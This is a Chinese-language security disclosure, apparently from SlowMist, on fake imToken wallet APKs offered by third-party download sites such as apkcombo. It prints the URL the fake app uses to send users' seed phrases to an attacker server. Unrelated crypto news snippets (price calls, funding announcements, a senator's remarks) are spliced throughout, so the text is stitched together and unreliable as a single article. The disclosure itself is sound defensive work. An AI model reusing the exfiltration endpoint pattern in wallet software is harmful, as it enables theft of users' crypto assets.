慢雾安全团队建议使用钱包、交易所时请认准官方下载渠道并从多方进行验证。
原文:https://foresightnews.pro/article/h5Detail/31716
作者:山&耀
转自:ForesightNews
背景
基于区块链技术的Web3正在驱动下一代技术革命,越来越多的人开始参与到这场加密浪潮中,但Web3与Web2是两个截然不同的世界。Web3世界是一个充满着各种各样的机遇以及危险的黑暗森林,身处Web3世界中,钱包则是进入Web3世界的入口以及通行证。
当你通过钱包在Web3世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包「登录」;这与我们传统意义上的「登录」不同,在Web2世界中,每个应用之间的账户不全是互通的。但在Web3的世界中,所有应用都是统一使用钱包去进行「登录」,我们可以看到「登录」钱包时显示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而钱包是你在Web3世界中的唯一通行证。
美国参议员Cory Booker:如果监管得当,加密货币可以给美国经济带来增长:3月14日消息,美国参议员Cory Booker认为加密货币是“一种令人兴奋的创新,如果得到适当的培育和监管,有潜力为美国经济带来增长。”这位来自新泽西州的参议员在推特上表示:“拜登总统最近关于数字资产行政命令微妙而乐观的基调让我感到鼓舞。正如该命令所指出的,美国在这个迅速发展的领域占据了领导地位,我们需要确保保持这一地位。”
Booker接着强调了保护投资者的重要性。他认为:“保护消费者的利益,必须与培育创新放在首位,以保持美国在全球舞台上的竞争力。我们必须采取有力措施,减少数字资产可能对消费者、投资者和商业保护构成的风险。”(Bitcoin.com)[2022/3/14 13:55:27]
俗话说高楼之下必有阴影,在如此火热的Web3世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
声音 | Titan Ventures创始人:如果比特币跌破8000美元,我将立刻购买:Titan Ventures创始人Michael Nye表示,“如果比特币跌破8000美元,我将立刻购买。”(U.Today)[2019/10/9]
在Android环境下,由于很多手机不支持GooglePlay或者因为网络问题,很多人会从其他途径下载GooglePlay的应用,比如:apkcombo、apkpure等第三方下载站,这些站点往往标榜自己App是从GooglePlay镜像下载的,但是其真实安全性如何呢?
网站分析
鉴于下载途径众多,我们今天以apkcombo为例看看,apkcombo是一个第三方应用市场,它提供的应用据官方说大部分来源于其他正规应用商店,但事实是否真如官方所说呢?
分析 | Coindesk:BTC上涨试探如果确认将突破4410美元:据Coindesk分析师称,BTC从一周低点3730美元附近反弹,降低跌至3500美元的可能性。在日线图上,BTC一直未能突破10日EMA,若跌破关键支撑位,则确认超卖反弹行情结束;另外,5日EMA和10日EMA继续向下,有利于空头,表明阻力最小的路径仍然是下行路径。但在小时图上,BTC从七日低点反弹,相对强弱指数(RSI)显示看涨背离,BTC随后将向上试探,如果确认,将突破4410美元(11月29日的高点),那将重新改变看跌观点。[2018/12/4]
我们先看下apkcombo的流量有多大:
据数据统计站点similarweb统计,apkcombo站点:
全球排名:1,809国家排名:7,370品类排名:168我们可以看到它的影响力和流量都非常大。它默认提供了一款chromeAPK下载插件,我们发现这款插件的用户数达到了10W:
Audacity推出6000万美元新基金,专注于Web3创作者经济和游戏等领域:7月26日消息,风险投资公司Audacity宣布推出6000万美元专注于Web3创作者经济及游戏等领域的新基金,旨在通过对一些媒体科技公司提供资金支持来弥合内容创作者从Web2到Web3的差距。
Audacity创始人Kabir Kochhar表示,虽然Web3应用层仍处于初期阶段,但随着媒体生态系统引入用户,Web3主流化速度将会加快,该公司将专注于美国和亚洲市场并参与种子轮和A轮阶段的融资交易。(acrofan)[2022/7/27 2:39:26]
那么回到我们关注的Web3领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?我们拿知名的imToken钱包为例,其GooglePlay的正规下载途径为:https://play.google.com/store/apps/details?id=im.token.app
Web3物联网经济网络peaq完成650万美元融资,Fundamental Labs领投:6月28日消息,基于Substrate的Web3物联网经济网络peaq宣布完成650万美元融资,Fundamental Labs领投,其他投资方包括HashKey Capital、GSR Markets、Delta VC、Mulana、Cypher Capital、GravityX、Waterdrip、Ceras和Master Ventures等。
peaq表示,将使用本轮融资筹集到的资金支持peaq网络的持续扩展,使得个人或组织能够从车辆、机器人和设备的去中心化应用中构建、管理和赚取收益。peaq是一个基于Substrate的、与波卡原生兼容的Layer1区块链,将把身份、访问和付款功能作为开发人员为物联网经济网络(Economy of Things,EOT)设计DApp的核心功能。[2022/6/28 1:36:59]
由于很多手机不支持GooglePlay或者因为网络问题,很多人会从这里下载GooglePlay的应用。而apkcombo镜像站的下载路径为:https://apkcombo.com/downloader/#package=im.token.app
上图我们可以发现,apkcombo提供的版本为24.9.11,经由imToken确认后,这是一个并不存在的版本!证实这是目前市面上假imToken钱包最多的一个版本。
在编写本文时imToken钱包的最新版本为2.11.3,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在apkcombo上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的GooglePlay的下载量信息,安全起见,我们觉得有必要披露这个恶意App的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown下载地址:https://imtoken.br.uptodown.com/android
我们发现uptodown任意注册即可发布App,这导致钓鱼的成本变得极低:
钱包分析
在之前我们已经分析过不少假钱包的案例,如:2021-11-24我们披露:《慢雾:假钱包App已致上万人被盗,损失高达十三亿美元》,所以在此不再赘述。
我们仅对apkcombo提供版本为24.9.11这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向APK代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>
看下图,最早的「api.funnel.rocks」证书出现在2022-06-03,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
总结
目前这种局活动不仅活跃,甚至有扩大范围的趋势,每天都有新的受害者受。用户作为安全体系最薄弱的环节,应时刻保持怀疑之心,增强安全意识与风险意识,当你使用钱包、交易所时请认准官方下载渠道并从多方进行验证;如果你的钱包从上述镜像站下载,请第一时间转移资产并卸载该软件,必要时可通过官方验证通道核实。
同时,如需使用钱包,请务必认准以下主流钱包App官方网址:
imToken钱包:https://token.im/TokenPocket钱包:https://www.tokenpocket.pro/TronLink钱包:https://www.tronlink.org/比特派钱包:https://bitpie.com/MetaMask钱包:https://metamask.io/TrustWallet:https://trustwallet.com/请持续关注慢雾安全团队,更多Web3安全风险分析与告警正在路上。
致谢:感谢在溯源过程中imToken官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。
?
标签:COMWEBAPKKENdefi communityWEBN tokenmetamask下载apkGXT Token
根据BloombergIntelligence的一份报告,随着下一次减半的影响开始,比特币(BTC)可能在明年反弹超过50,000美元.
周三亚洲早盘,比特币价格在过去24小时内小幅上涨3.4%,交易价格约为28,346美元。市值最高的数字资产正在重新测试上个月的阻力区。在此级别的拒绝可能导致头肩技术形态,导致未来几周进一步投降.
Sui(SuiNetwork)项目解析 1.研究院点评 1-1、Sui的开发团队MystenLabs由四位前Meta工程师开发.
周末,瑞波币下跌1.60%,部分抵消了前一天5.10%的涨幅。因此,XRP本周收盘下跌10.83%至0.46477美元,这是自3月26日以来第二次收于0.47美元以下.
ShibaInu正在交易具有四个“零”的指数,并且在过去18个月中努力删除一个“零”。SHIB在2021年10月打破了“零”,在3天内飙升1,000%,达到0.00008616美元的历史新高.
尊敬的XT.COM用戶:為了提供更加安全可靠的加密貨幣交易服務,XT.COM啟動了漏洞賞金計劃,我們意識到即使最完善的系統也可能存在漏洞,所以希望通過懸賞的方式鼓勵黑客檢測並報告平台的安全問題.